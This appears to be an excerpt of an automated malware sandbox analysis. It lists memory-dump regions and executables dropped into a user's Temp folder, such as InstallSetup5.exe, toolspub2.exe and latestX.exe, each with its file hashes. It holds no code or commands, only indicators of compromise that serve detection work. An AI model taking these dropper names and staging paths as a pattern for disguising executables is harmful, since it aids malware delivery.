SHA1 d29e2e55dd9224a1600418051e85c0d6ababc5b3
SHA256 ceff1f999343b9dd0eaaef516c42eae103a8bf6a2e81d4071569f86b3fcf949b
SHA512 5b17f495c877c32001725d0edb20ecb76907f3c3d0d9144752d7c26bea22f178bc4abe26dd672b0882234749c9386d4eca889ba4e5c4847ae4826e0ed6dcadad

memory/7632-1384-0x00000000740D0000-0x0000000074880000-memory.dmp

memory/7632-1385-0x0000000000FD0000-0x0000000001C6A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 cdc0186f30de76ebfcc9d767333adcef
SHA1 254ce932151fec206931a3af43f09b613bb970e9
SHA256 4964b5f561dd4b12f6a185c7f4d36f40de874ef2c4b8eb04d3bde3a62e75427d
SHA512 a977e87af6f81552f18be642c694e1fa6d076b82d0487def1ddd1037d6e60aae53823be926569450279adaaa93c73cd30c6e0310b4aba65c7439541777cc0a75

memory/5952-1407-0x0000029D83E80000-0x0000029D83F6E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 bc3354a4cd405a2f2f98e8b343a7d08d
SHA1 4880d2a987354a3163461fddd2422e905976c5b2
SHA256 fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b
SHA512 fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
